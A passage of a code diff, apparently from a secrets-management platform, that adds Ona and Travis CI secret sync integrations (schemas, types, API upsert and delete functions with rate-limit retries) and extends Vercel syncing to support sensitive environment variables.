no-await-in-loop + await createEnvVarSecret(secretSync, key, secretMap[key].value); + } else { + // eslint-disable-next-line no-await-in-loop + await updateSecretValue(secretSync, prior.id, secretMap[key].value); + } + } catch (error) { + if (error instanceof SecretSyncError) throw error; + throw new 
SecretSyncError({ error, secretKey: key }); + } + } + + if (secretSync.syncOptions.disableSecretDeletion) return; + + for (const existing of existingSecrets) { + if (!matchesSchema(existing.name, secretSync.environment?.slug || "", secretSync.syncOptions.keySchema)) { + // eslint-disable-next-line no-continue + continue; + } + if (secretMap[existing.name]) { + // eslint-disable-next-line no-continue + continue; + } + try { + // eslint-disable-next-line no-await-in-loop + await deleteSecret(secretSync, existing.id); + } catch (error) { + if (error instanceof SecretSyncError) throw error; + throw new SecretSyncError({ error, secretKey: existing.name }); + } + } + }, + + getSecrets: async (): Promise => { + // Ona's GetSecretValue endpoint only returns values from within an active workspace/environment, + // so importing secret values from outside a workspace is not possible with a PAT. Import is + // intentionally disabled (canImportSecrets: false on the schema/list-item). + throw new Error("Ona does not support importing secrets."); + }, + + removeSecrets: async (secretSync: TOnaSyncWithCredentials, secretMap: TSecretMap) => { + const existingSecrets = await listEnvVarSecrets(secretSync); + + for (const existing of existingSecrets) { + if (!(existing.name in secretMap)) { + // eslint-disable-next-line no-continue + continue; + } + try { + // eslint-disable-next-line no-await-in-loop + await deleteSecret(secretSync, existing.id); + } catch (error) { + if (error instanceof SecretSyncError) throw error; + throw new SecretSyncError({ error, secretKey: existing.name }); + } + } + } +}; diff --git a/backend/src/services/secret-sync/ona/ona-sync-schemas.ts b/backend/src/services/secret-sync/ona/ona-sync-schemas.ts new file mode 100644 index 00000000000..34ac6e4d5bc --- /dev/null +++ b/backend/src/services/secret-sync/ona/ona-sync-schemas.ts @@ -0,0 +1,49 @@ +import { z } from "zod"; + +import { SecretSyncs } from "@app/lib/api-docs"; +import { AppConnection } from 
"@app/services/app-connection/app-connection-enums"; +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { + BaseSecretSyncSchema, + GenericCreateSecretSyncFieldsSchema, + GenericUpdateSecretSyncFieldsSchema +} from "@app/services/secret-sync/secret-sync-schemas"; +import { TSyncOptionsConfig } from "@app/services/secret-sync/secret-sync-types"; + +import { SECRET_SYNC_NAME_MAP } from "../secret-sync-maps"; + +const OnaSyncDestinationConfigSchema = z.object({ + projectId: z + .string() + .trim() + .min(1, "Ona project ID is required") + .describe(SecretSyncs.DESTINATION_CONFIG.ONA.projectId), + projectName: z.string().trim().optional().describe(SecretSyncs.DESTINATION_CONFIG.ONA.projectName) +}); + +const OnaSyncOptionsConfig: TSyncOptionsConfig = { canImportSecrets: false }; + +export const OnaSyncSchema = BaseSecretSyncSchema(SecretSync.Ona, OnaSyncOptionsConfig) + .extend({ + destination: z.literal(SecretSync.Ona), + destinationConfig: OnaSyncDestinationConfigSchema + }) + .describe(JSON.stringify({ title: SECRET_SYNC_NAME_MAP[SecretSync.Ona] })); + +export const CreateOnaSyncSchema = GenericCreateSecretSyncFieldsSchema(SecretSync.Ona, OnaSyncOptionsConfig).extend({ + destinationConfig: OnaSyncDestinationConfigSchema +}); + +export const UpdateOnaSyncSchema = GenericUpdateSecretSyncFieldsSchema(SecretSync.Ona, OnaSyncOptionsConfig).extend({ + destinationConfig: OnaSyncDestinationConfigSchema.optional() +}); + +export const OnaSyncListItemSchema = z + .object({ + name: z.literal("Ona"), + connection: z.literal(AppConnection.Ona), + destination: z.literal(SecretSync.Ona), + canImportSecrets: z.literal(false), + canRemoveSecretsOnDeletion: z.literal(true) + }) + .describe(JSON.stringify({ title: SECRET_SYNC_NAME_MAP[SecretSync.Ona] })); diff --git a/backend/src/services/secret-sync/ona/ona-sync-types.ts b/backend/src/services/secret-sync/ona/ona-sync-types.ts new file mode 100644 index 00000000000..a88be68ba9c --- /dev/null +++ 
b/backend/src/services/secret-sync/ona/ona-sync-types.ts @@ -0,0 +1,38 @@ +import { z } from "zod"; + +import { TOnaConnection } from "@app/services/app-connection/ona"; + +import { CreateOnaSyncSchema, OnaSyncListItemSchema, OnaSyncSchema } from "./ona-sync-schemas"; + +export type TOnaSync = z.infer; + +export type TOnaSyncInput = z.infer; + +export type TOnaSyncListItem = z.infer; + +export type TOnaSyncWithCredentials = TOnaSync & { + connection: TOnaConnection; +}; + +export type TOnaSecret = { + id: string; + name: string; + environmentVariable?: boolean; + scope?: { + projectId?: string; + userId?: string; + organizationId?: string; + serviceAccountId?: string; + }; +}; + +export type TOnaListSecretsResponse = { + secrets?: TOnaSecret[]; + pagination?: { + nextToken?: string; + }; +}; + +export type TOnaGetSecretValueResponse = { + value?: string; +}; diff --git a/backend/src/services/secret-sync/secret-sync-enums.ts b/backend/src/services/secret-sync/secret-sync-enums.ts index 92dbd907fa9..580cb08bcfe 100644 --- a/backend/src/services/secret-sync/secret-sync-enums.ts +++ b/backend/src/services/secret-sync/secret-sync-enums.ts @@ -35,7 +35,9 @@ export enum SecretSync { OctopusDeploy = "octopus-deploy", CircleCI = "circleci", AzureEntraIdScim = "azure-entra-id-scim", - ExternalInfisical = "external-infisical" + ExternalInfisical = "external-infisical", + Ona = "ona", + TravisCI = "travis-ci" } export enum SecretSyncInitialSyncBehavior { diff --git a/backend/src/services/secret-sync/secret-sync-fns.ts b/backend/src/services/secret-sync/secret-sync-fns.ts index cfd34bf4cad..37d9be5007c 100644 --- a/backend/src/services/secret-sync/secret-sync-fns.ts +++ b/backend/src/services/secret-sync/secret-sync-fns.ts @@ -69,6 +69,7 @@ import { LARAVEL_FORGE_SYNC_LIST_OPTION, LaravelForgeSyncFns } from "./laravel-f import { NETLIFY_SYNC_LIST_OPTION, NetlifySyncFns } from "./netlify"; import { NORTHFLANK_SYNC_LIST_OPTION, NorthflankSyncFns } from "./northflank"; import { 
OCTOPUS_DEPLOY_SYNC_LIST_OPTION, OctopusDeploySyncFns } from "./octopus-deploy"; +import { ONA_SYNC_LIST_OPTION, OnaSyncFns } from "./ona"; import { RAILWAY_SYNC_LIST_OPTION } from "./railway/railway-sync-constants"; import { RailwaySyncFns } from "./railway/railway-sync-fns"; import { RENDER_SYNC_LIST_OPTION, RenderSyncFns } from "./render"; @@ -76,6 +77,7 @@ import { SECRET_SYNC_PLAN_MAP } from "./secret-sync-maps"; import { SUPABASE_SYNC_LIST_OPTION, SupabaseSyncFns } from "./supabase"; import { TEAMCITY_SYNC_LIST_OPTION, TeamCitySyncFns } from "./teamcity"; import { TERRAFORM_CLOUD_SYNC_LIST_OPTION, TerraformCloudSyncFns } from "./terraform-cloud"; +import { TRAVIS_CI_SYNC_LIST_OPTION, TravisCISyncFns } from "./travis-ci"; import { VERCEL_SYNC_LIST_OPTION, VercelSyncFns } from "./vercel"; import { WINDMILL_SYNC_LIST_OPTION, WindmillSyncFns } from "./windmill"; import { ZABBIX_SYNC_LIST_OPTION, ZabbixSyncFns } from "./zabbix"; @@ -117,7 +119,9 @@ const SECRET_SYNC_LIST_OPTIONS: Record = { [SecretSync.OctopusDeploy]: OCTOPUS_DEPLOY_SYNC_LIST_OPTION, [SecretSync.CircleCI]: CIRCLECI_SYNC_LIST_OPTION, [SecretSync.AzureEntraIdScim]: AZURE_ENTRA_ID_SCIM_SYNC_LIST_OPTION, - [SecretSync.ExternalInfisical]: EXTERNAL_INFISICAL_SYNC_LIST_OPTION + [SecretSync.ExternalInfisical]: EXTERNAL_INFISICAL_SYNC_LIST_OPTION, + [SecretSync.Ona]: ONA_SYNC_LIST_OPTION, + [SecretSync.TravisCI]: TRAVIS_CI_SYNC_LIST_OPTION }; export const listSecretSyncOptions = () => { @@ -378,6 +382,10 @@ export const SecretSyncFns = { // Key schema is intentionally not applied for Infisical-to-Infisical syncs to prevent // infinite sync loops where the prefixed key triggers another sync cycle. 
return ExternalInfisicalSyncFns.syncSecrets(secretSync, secretMap); + case SecretSync.Ona: + return OnaSyncFns.syncSecrets(secretSync, schemaSecretMap); + case SecretSync.TravisCI: + return TravisCISyncFns.syncSecrets(secretSync, schemaSecretMap); default: throw new Error( `Unhandled sync destination for sync secrets fns: ${(secretSync as TSecretSyncWithCredentials).destination}` @@ -518,6 +526,12 @@ export const SecretSyncFns = { case SecretSync.ExternalInfisical: secretMap = await ExternalInfisicalSyncFns.getSecrets(secretSync); break; + case SecretSync.Ona: + secretMap = await OnaSyncFns.getSecrets(); + break; + case SecretSync.TravisCI: + secretMap = await TravisCISyncFns.getSecrets(secretSync); + break; default: throw new Error( `Unhandled sync destination for get secrets fns: ${(secretSync as TSecretSyncWithCredentials).destination}` @@ -627,6 +641,10 @@ export const SecretSyncFns = { // Key schema is intentionally not applied for Infisical-to-Infisical syncs to prevent // infinite sync loops where the prefixed key triggers another sync cycle. 
return ExternalInfisicalSyncFns.removeSecrets(secretSync, secretMap); + case SecretSync.Ona: + return OnaSyncFns.removeSecrets(secretSync, schemaSecretMap); + case SecretSync.TravisCI: + return TravisCISyncFns.removeSecrets(secretSync, schemaSecretMap); default: throw new Error( `Unhandled sync destination for remove secrets fns: ${(secretSync as TSecretSyncWithCredentials).destination}` diff --git a/backend/src/services/secret-sync/secret-sync-maps.ts b/backend/src/services/secret-sync/secret-sync-maps.ts index 9fe6f036422..6acd04a1c0e 100644 --- a/backend/src/services/secret-sync/secret-sync-maps.ts +++ b/backend/src/services/secret-sync/secret-sync-maps.ts @@ -39,7 +39,9 @@ export const SECRET_SYNC_NAME_MAP: Record = { [SecretSync.OctopusDeploy]: "Octopus Deploy", [SecretSync.CircleCI]: "CircleCI", [SecretSync.AzureEntraIdScim]: "Azure Entra ID SCIM", - [SecretSync.ExternalInfisical]: "Infisical" + [SecretSync.ExternalInfisical]: "Infisical", + [SecretSync.Ona]: "Ona", + [SecretSync.TravisCI]: "Travis CI" }; export const SECRET_SYNC_CONNECTION_MAP: Record = { @@ -79,7 +81,9 @@ export const SECRET_SYNC_CONNECTION_MAP: Record = { [SecretSync.OctopusDeploy]: AppConnection.OctopusDeploy, [SecretSync.CircleCI]: AppConnection.CircleCI, [SecretSync.AzureEntraIdScim]: AppConnection.AzureEntraId, - [SecretSync.ExternalInfisical]: AppConnection.ExternalInfisical + [SecretSync.ExternalInfisical]: AppConnection.ExternalInfisical, + [SecretSync.Ona]: AppConnection.Ona, + [SecretSync.TravisCI]: AppConnection.TravisCI }; export const SECRET_SYNC_PLAN_MAP: Record = { @@ -119,7 +123,9 @@ export const SECRET_SYNC_PLAN_MAP: Record = { [SecretSync.OctopusDeploy]: SecretSyncPlanType.Regular, [SecretSync.CircleCI]: SecretSyncPlanType.Regular, [SecretSync.AzureEntraIdScim]: SecretSyncPlanType.Regular, - [SecretSync.ExternalInfisical]: SecretSyncPlanType.Regular + [SecretSync.ExternalInfisical]: SecretSyncPlanType.Regular, + [SecretSync.Ona]: SecretSyncPlanType.Regular, + 
[SecretSync.TravisCI]: SecretSyncPlanType.Regular }; export const SECRET_SYNC_SKIP_FIELDS_MAP: Record = { @@ -168,7 +174,9 @@ export const SECRET_SYNC_SKIP_FIELDS_MAP: Record = { [SecretSync.OctopusDeploy]: [], [SecretSync.CircleCI]: [], [SecretSync.AzureEntraIdScim]: [], - [SecretSync.ExternalInfisical]: [] + [SecretSync.ExternalInfisical]: [], + [SecretSync.Ona]: ["projectName"], + [SecretSync.TravisCI]: ["repositorySlug"] }; const defaultDuplicateCheck: DestinationDuplicateCheckFn = () => true; @@ -234,7 +242,9 @@ export const DESTINATION_DUPLICATE_CHECK_MAP: Record; kmsService: Pick; permissionService: Pick; - projectDAL: Pick; orgDAL: Pick; projectBotService: Pick; folderDAL: Pick; @@ -86,7 +86,6 @@ export const secretSyncServiceFactory = ({ appConnectionService, kmsService, permissionService, - projectDAL, orgDAL, projectBotService, secretSyncQueue, @@ -360,12 +359,11 @@ export const secretSyncServiceFactory = ({ message: `Could not find folder with path "${secretPath}" in environment "${environment}" for project with ID "${projectId}"` }); - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ message: "Project not found" }); - } - - const organization = await orgDAL.findById(project.orgId); + // getProjectPermission above throws NotFoundError if the project doesn't exist and + // guarantees actor.orgId === project.orgId β€” no separate project lookup needed. 
+ const organization = await requestMemoize(requestMemoKeys.orgFindById(actor.orgId), () => + orgDAL.findById(actor.orgId) + ); if (organization?.blockDuplicateSecretSyncDestinations) { const duplicateCheck = await checkDuplicateDestination( { @@ -494,11 +492,11 @@ export const secretSyncServiceFactory = ({ let { folderId } = secretSync; if (params.destinationConfig) { - const project = await projectDAL.findById(secretSync.projectId); - if (!project) { - throw new NotFoundError({ message: "Project not found" }); - } - const organization = await orgDAL.findById(project.orgId); + // getProjectPermission above throws NotFoundError if the project doesn't exist and + // guarantees actor.orgId === project.orgId β€” no separate project lookup needed. + const organization = await requestMemoize(requestMemoKeys.orgFindById(actor.orgId), () => + orgDAL.findById(actor.orgId) + ); if (organization?.blockDuplicateSecretSyncDestinations) { const duplicateCheck = await checkDuplicateDestination( diff --git a/backend/src/services/secret-sync/secret-sync-types.ts b/backend/src/services/secret-sync/secret-sync-types.ts index dc2df1e2bc9..7252f901b7f 100644 --- a/backend/src/services/secret-sync/secret-sync-types.ts +++ b/backend/src/services/secret-sync/secret-sync-types.ts @@ -158,6 +158,7 @@ import { TOctopusDeploySyncListItem, TOctopusDeploySyncWithCredentials } from "./octopus-deploy"; +import { TOnaSync, TOnaSyncInput, TOnaSyncListItem, TOnaSyncWithCredentials } from "./ona"; import { TRailwaySync, TRailwaySyncInput, @@ -188,6 +189,7 @@ import { TTerraformCloudSyncListItem, TTerraformCloudSyncWithCredentials } from "./terraform-cloud"; +import { TTravisCISync, TTravisCISyncInput, TTravisCISyncListItem, TTravisCISyncWithCredentials } from "./travis-ci"; import { TVercelSync, TVercelSyncInput, TVercelSyncListItem, TVercelSyncWithCredentials } from "./vercel"; import { TZabbixSync, TZabbixSyncInput, TZabbixSyncListItem, TZabbixSyncWithCredentials } from "./zabbix"; @@ -227,7 
+229,9 @@ export type TSecretSync = | TOctopusDeploySync | TCircleCISync | TAzureEntraIdScimSync - | TExternalInfisicalSync; + | TExternalInfisicalSync + | TOnaSync + | TTravisCISync; export type TSecretSyncWithCredentials = | TAwsParameterStoreSyncWithCredentials @@ -266,7 +270,9 @@ export type TSecretSyncWithCredentials = | TOctopusDeploySyncWithCredentials | TCircleCISyncWithCredentials | TAzureEntraIdScimSyncWithCredentials - | TExternalInfisicalSyncWithCredentials; + | TExternalInfisicalSyncWithCredentials + | TOnaSyncWithCredentials + | TTravisCISyncWithCredentials; export type TSecretSyncInput = | TAwsParameterStoreSyncInput @@ -305,7 +311,9 @@ export type TSecretSyncInput = | TOctopusDeploySyncInput | TCircleCISyncInput | TAzureEntraIdScimSyncInput - | TExternalInfisicalSyncInput; + | TExternalInfisicalSyncInput + | TOnaSyncInput + | TTravisCISyncInput; export type TSecretSyncListItem = | TAwsParameterStoreSyncListItem @@ -344,7 +352,9 @@ export type TSecretSyncListItem = | TOctopusDeploySyncListItem | TCircleCISyncListItem | TAzureEntraIdScimSyncListItem - | TExternalInfisicalSyncListItem; + | TExternalInfisicalSyncListItem + | TOnaSyncListItem + | TTravisCISyncListItem; export type TSyncOptionsConfig = { canImportSecrets: boolean; diff --git a/backend/src/services/secret-sync/travis-ci/index.ts b/backend/src/services/secret-sync/travis-ci/index.ts new file mode 100644 index 00000000000..b38ee2d27d4 --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/index.ts @@ -0,0 +1,4 @@ +export * from "./travis-ci-sync-constants"; +export * from "./travis-ci-sync-fns"; +export * from "./travis-ci-sync-schemas"; +export * from "./travis-ci-sync-types"; diff --git a/backend/src/services/secret-sync/travis-ci/travis-ci-sync-constants.ts b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-constants.ts new file mode 100644 index 00000000000..e78e4b13247 --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-constants.ts @@ -0,0 
+1,11 @@ +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { TSecretSyncListItem } from "@app/services/secret-sync/secret-sync-types"; + +export const TRAVIS_CI_SYNC_LIST_OPTION: TSecretSyncListItem = { + name: "Travis CI", + destination: SecretSync.TravisCI, + connection: AppConnection.TravisCI, + canRemoveSecretsOnDeletion: true, + canImportSecrets: false +}; diff --git a/backend/src/services/secret-sync/travis-ci/travis-ci-sync-fns.ts b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-fns.ts new file mode 100644 index 00000000000..77022b5ec0e --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-fns.ts @@ -0,0 +1,222 @@ +/* eslint-disable no-await-in-loop */ +/* eslint-disable no-continue */ +import { isAxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { IntegrationUrls } from "@app/services/integration-auth/integration-list"; +import { SecretSyncError } from "@app/services/secret-sync/secret-sync-errors"; +import { matchesSchema } from "@app/services/secret-sync/secret-sync-fns"; +import { TSecretMap } from "@app/services/secret-sync/secret-sync-types"; + +import { SECRET_SYNC_NAME_MAP } from "../secret-sync-maps"; +import { TTravisCIEnvVar, TTravisCISyncWithCredentials } from "./travis-ci-sync-types"; + +const BASE_DELAY_MS = 100; +const MAX_DELAY_MS = 5000; +const MAX_RETRIES = 5; + +const sleep = (ms: number) => + new Promise((resolve) => { + setTimeout(resolve, ms); + }); + +type Throttle = { + wait: () => Promise; + bumpOn429: () => void; +}; + +const makeThrottle = (): Throttle => { + let currentDelayMs = BASE_DELAY_MS; + return { + wait: () => sleep(currentDelayMs), + bumpOn429: () => { + currentDelayMs = Math.min(currentDelayMs * 2, MAX_DELAY_MS); + } + }; +}; + +const makeRequestWithRetry = async (throttle: Throttle, requestFn: () => Promise, attempt = 0): Promise => 
{ + await throttle.wait(); + try { + return await requestFn(); + } catch (error) { + if (isAxiosError(error) && error.response?.status === 429 && attempt < MAX_RETRIES) { + throttle.bumpOn429(); + return makeRequestWithRetry(throttle, requestFn, attempt + 1); + } + throw error; + } +}; + +const travisCIApiHeaders = (apiToken: string) => ({ + Authorization: `token ${apiToken}`, + "Travis-API-Version": "3", + Accept: "application/json" +}); + +const getRepoEnvVars = async ( + apiToken: string, + repositoryId: string, + throttle: Throttle +): Promise => { + const { data } = await makeRequestWithRetry(throttle, () => + request.get<{ env_vars: TTravisCIEnvVar[] }>( + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodeURIComponent(repositoryId)}/env_vars`, + { headers: travisCIApiHeaders(apiToken) } + ) + ); + + return data?.env_vars ?? []; +}; + +const filterByScope = ( + envVars: TTravisCIEnvVar[], + destinationConfig: TTravisCISyncWithCredentials["destinationConfig"] +): TTravisCIEnvVar[] => { + if (destinationConfig.branch) { + return envVars.filter((envVar) => envVar.branch === destinationConfig.branch); + } + + return envVars.filter((envVar) => envVar.branch === null); +}; + +type TTravisCIEnvVarUpsertBody = { + "env_var.name": string; + "env_var.value": string; + "env_var.public": boolean; + "env_var.branch"?: string; +}; + +const upsertRepoEnvVar = async ({ + apiToken, + repositoryId, + existingEnvVarId, + body, + throttle +}: { + apiToken: string; + repositoryId: string; + existingEnvVarId?: string; + body: TTravisCIEnvVarUpsertBody; + throttle: Throttle; +}): Promise => { + const headers = { ...travisCIApiHeaders(apiToken), "Content-Type": "application/json" }; + const encodedRepoId = encodeURIComponent(repositoryId); + + if (existingEnvVarId) { + await makeRequestWithRetry(throttle, () => + request.patch( + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodedRepoId}/env_var/${encodeURIComponent(existingEnvVarId)}`, + body, + { headers } + ) + ); + return; + } + 
+ await makeRequestWithRetry(throttle, () => + request.post(`${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodedRepoId}/env_vars`, body, { headers }) + ); +}; + +export const TravisCISyncFns = { + async getSecrets(secretSync: TTravisCISyncWithCredentials): Promise { + throw new Error(`${SECRET_SYNC_NAME_MAP[secretSync.destination]} does not support importing secrets.`); + }, + + async syncSecrets(secretSync: TTravisCISyncWithCredentials, secretMap: TSecretMap): Promise { + const { + connection: { + credentials: { apiToken } + }, + destinationConfig, + environment, + syncOptions: { disableSecretDeletion, keySchema } + } = secretSync; + + const throttle = makeThrottle(); + const envVars = await getRepoEnvVars(apiToken, destinationConfig.repositoryId, throttle); + const scopedEnvVars = filterByScope(envVars, destinationConfig); + const scopedByName = Object.fromEntries(scopedEnvVars.map((envVar) => [envVar.name, envVar])); + + for (const key of Object.keys(secretMap)) { + try { + const entry = secretMap[key]; + const body: TTravisCIEnvVarUpsertBody = { + "env_var.name": key, + "env_var.value": entry.value, + "env_var.public": false + }; + + const { branch } = destinationConfig; + if (typeof branch === "string" && branch.length > 0) { + body["env_var.branch"] = branch; + } + + await upsertRepoEnvVar({ + apiToken, + repositoryId: destinationConfig.repositoryId, + existingEnvVarId: scopedByName[key]?.id, + body, + throttle + }); + } catch (error) { + throw new SecretSyncError({ error, secretKey: key }); + } + } + + if (disableSecretDeletion) return; + + // check if it is possible to delete in bulk + + for (const envVar of scopedEnvVars) { + if (!matchesSchema(envVar.name, environment?.slug || "", keySchema)) continue; + if (envVar.name in secretMap) continue; + + try { + await makeRequestWithRetry(throttle, () => + request.delete( + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodeURIComponent( + destinationConfig.repositoryId + 
)}/env_var/${encodeURIComponent(envVar.id)}`, + { headers: travisCIApiHeaders(apiToken) } + ) + ); + } catch (error) { + if (isAxiosError(error) && error.response?.status === 404) continue; + throw new SecretSyncError({ error, secretKey: envVar.name }); + } + } + }, + + async removeSecrets(secretSync: TTravisCISyncWithCredentials, secretMap: TSecretMap): Promise { + const { + connection: { + credentials: { apiToken } + }, + destinationConfig + } = secretSync; + + const throttle = makeThrottle(); + const envVars = await getRepoEnvVars(apiToken, destinationConfig.repositoryId, throttle); + const scopedEnvVars = filterByScope(envVars, destinationConfig); + + for (const envVar of scopedEnvVars) { + if (!(envVar.name in secretMap)) continue; + + try { + await makeRequestWithRetry(throttle, () => + request.delete( + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodeURIComponent( + destinationConfig.repositoryId + )}/env_var/${encodeURIComponent(envVar.id)}`, + { headers: travisCIApiHeaders(apiToken) } + ) + ); + } catch (error) { + if (isAxiosError(error) && error.response?.status === 404) continue; + throw new SecretSyncError({ error, secretKey: envVar.name }); + } + } + } +}; diff --git a/backend/src/services/secret-sync/travis-ci/travis-ci-sync-schemas.ts b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-schemas.ts new file mode 100644 index 00000000000..9354a10bf85 --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-schemas.ts @@ -0,0 +1,60 @@ +import { z } from "zod"; + +import { SecretSyncs } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { + BaseSecretSyncSchema, + GenericCreateSecretSyncFieldsSchema, + GenericUpdateSecretSyncFieldsSchema +} from "@app/services/secret-sync/secret-sync-schemas"; +import { TSyncOptionsConfig } from "@app/services/secret-sync/secret-sync-types"; + +import 
{ SECRET_SYNC_NAME_MAP } from "../secret-sync-maps"; + +const TravisCISyncDestinationConfigSchema = z.object({ + repositoryId: z + .string() + .trim() + .min(1, "Repository ID is required") + .describe(SecretSyncs.DESTINATION_CONFIG.TRAVIS_CI.repositoryId), + repositorySlug: z + .string() + .trim() + .min(1, "Repository slug is required") + .describe(SecretSyncs.DESTINATION_CONFIG.TRAVIS_CI.repositorySlug), + branch: z.string().trim().min(1).optional().describe(SecretSyncs.DESTINATION_CONFIG.TRAVIS_CI.branch) +}); + +const TravisCISyncOptionsConfig: TSyncOptionsConfig = { canImportSecrets: false }; + +export const TravisCISyncSchema = BaseSecretSyncSchema(SecretSync.TravisCI, TravisCISyncOptionsConfig) + .extend({ + destination: z.literal(SecretSync.TravisCI), + destinationConfig: TravisCISyncDestinationConfigSchema + }) + .describe(JSON.stringify({ title: SECRET_SYNC_NAME_MAP[SecretSync.TravisCI] })); + +export const CreateTravisCISyncSchema = GenericCreateSecretSyncFieldsSchema( + SecretSync.TravisCI, + TravisCISyncOptionsConfig +).extend({ + destinationConfig: TravisCISyncDestinationConfigSchema +}); + +export const UpdateTravisCISyncSchema = GenericUpdateSecretSyncFieldsSchema( + SecretSync.TravisCI, + TravisCISyncOptionsConfig +).extend({ + destinationConfig: TravisCISyncDestinationConfigSchema.optional() +}); + +export const TravisCISyncListItemSchema = z + .object({ + name: z.literal("Travis CI"), + connection: z.literal(AppConnection.TravisCI), + destination: z.literal(SecretSync.TravisCI), + canImportSecrets: z.literal(false), + canRemoveSecretsOnDeletion: z.literal(true) + }) + .describe(JSON.stringify({ title: SECRET_SYNC_NAME_MAP[SecretSync.TravisCI] })); diff --git a/backend/src/services/secret-sync/travis-ci/travis-ci-sync-types.ts b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-types.ts new file mode 100644 index 00000000000..1f6d56cc7d3 --- /dev/null +++ b/backend/src/services/secret-sync/travis-ci/travis-ci-sync-types.ts @@ -0,0 +1,23 
@@ +import { z } from "zod"; + +import { TTravisCIConnection } from "@app/services/app-connection/travis-ci"; + +import { CreateTravisCISyncSchema, TravisCISyncListItemSchema, TravisCISyncSchema } from "./travis-ci-sync-schemas"; + +export type TTravisCISyncListItem = z.infer; + +export type TTravisCISync = z.infer; + +export type TTravisCISyncInput = z.infer; + +export type TTravisCISyncWithCredentials = TTravisCISync & { + connection: TTravisCIConnection; +}; + +export type TTravisCIEnvVar = { + id: string; + name: string; + value: string | null; + public: boolean; + branch: string | null; +}; diff --git a/backend/src/services/secret-sync/vercel/vercel-sync-fns.ts b/backend/src/services/secret-sync/vercel/vercel-sync-fns.ts index 730270f74d6..c12896f3f2e 100644 --- a/backend/src/services/secret-sync/vercel/vercel-sync-fns.ts +++ b/backend/src/services/secret-sync/vercel/vercel-sync-fns.ts @@ -228,7 +228,7 @@ const createSecret = async ( { key, value: secretMap[key].value, - type: "encrypted", + type: destinationConfig.sensitive ? "sensitive" : "encrypted", target: isVercelDefaultEnvType(destinationConfig.env) ? [destinationConfig.env] : [], customEnvironmentIds: !isVercelDefaultEnvType(destinationConfig.env) ? [destinationConfig.env] : [], ...(destinationConfig.env === VercelEnvironmentType.Preview && destinationConfig.branch @@ -320,6 +320,27 @@ const updateSecret = async ( // ===== Team-scoped shared environment variable functions ===== +type TeamDestinationConfig = Extract; + +const setsEqual = (a: readonly string[] | undefined, b: readonly string[] | undefined) => { + const av = a ?? []; + const bv = b ?? []; + if (av.length !== bv.length) return false; + const bSet = new Set(bv); + return av.every((v) => bSet.has(v)); +}; + +const isTeamSharedEnvVarOwnedByThisSync = (envVar: VercelSharedEnvVar, destinationConfig: TeamDestinationConfig) => { + const expectedType = destinationConfig.sensitive ? 
"sensitive" : "encrypted"; + if (envVar.type !== expectedType) return false; + + const effectiveTargets = destinationConfig.sensitive + ? destinationConfig.targetEnvironments?.filter((env) => env !== VercelEnvironmentType.Development) + : destinationConfig.targetEnvironments; + + return setsEqual(envVar.target, effectiveTargets) && setsEqual(envVar.projectId, destinationConfig.targetProjects); +}; + const listTeamSharedEnvVarsWithRetries = async ( secretSync: TVercelSyncWithCredentials ): Promise => { @@ -431,6 +452,19 @@ const getTeamSharedEnvVars = async (secretSync: TVercelSyncWithCredentials): Pro return envVarsWithValues; }; +const getOwnedTeamSharedEnvVars = async (secretSync: TVercelSyncWithCredentials): Promise => { + if (secretSync.destinationConfig.scope !== VercelSyncScope.Team) { + throw new SecretSyncError({ + message: "Invalid scope for team-level Vercel secret sync", + shouldRetry: false + }); + } + + const teamDestinationConfig = secretSync.destinationConfig; + const allSharedEnvVars = await getTeamSharedEnvVars(secretSync); + return allSharedEnvVars.filter((envVar) => isTeamSharedEnvVarOwnedByThisSync(envVar, teamDestinationConfig)); +}; + const createTeamSharedEnvVar = async ( secretSync: TVercelSyncWithCredentials, key: string, @@ -451,6 +485,24 @@ const createTeamSharedEnvVar = async ( }); } + // When sensitive is enabled, the Development environment is not supported by Vercel. + const effectiveTargetEnvironments = destinationConfig.targetEnvironments?.filter( + (env) => !destinationConfig.sensitive || env !== VercelEnvironmentType.Development + ); + + if ( + destinationConfig.sensitive && + !destinationConfig.applyToAllCustomEnvironments && + (!effectiveTargetEnvironments || effectiveTargetEnvironments.length === 0) + ) { + throw new SecretSyncError({ + message: + "Marking secrets as sensitive in Vercel is not supported for development environments. 
Add another target environment or disable Sensitive.", + secretKey: key, + shouldRetry: false + }); + } + try { const { data: createResponse } = await request.post<{ created: VercelSharedEnvVar[]; @@ -459,9 +511,10 @@ const createTeamSharedEnvVar = async ( `${IntegrationUrls.VERCEL_API_URL}/v1/env?teamId=${destinationConfig.teamId}`, { evs: [{ key, value }], - type: "encrypted", - ...(destinationConfig.targetEnvironments?.length ? { target: destinationConfig.targetEnvironments } : {}), - ...(destinationConfig.targetProjects !== undefined ? { projectId: destinationConfig.targetProjects } : {}) + type: destinationConfig.sensitive ? "sensitive" : "encrypted", + ...(effectiveTargetEnvironments?.length ? { target: effectiveTargetEnvironments } : {}), + ...(destinationConfig.targetProjects !== undefined ? { projectId: destinationConfig.targetProjects } : {}), + applyToAllCustomEnvironments: Boolean(destinationConfig.applyToAllCustomEnvironments) }, { headers: { @@ -508,6 +561,26 @@ const updateTeamSharedEnvVar = async ( }); } + const isExistingSensitive = envVar.type === "sensitive"; + + // When sensitive is enabled, the Development environment is not supported by Vercel. + const effectiveTargetEnvironments = destinationConfig.targetEnvironments?.filter( + (env) => !(destinationConfig.sensitive || isExistingSensitive) || env !== VercelEnvironmentType.Development + ); + + if ( + 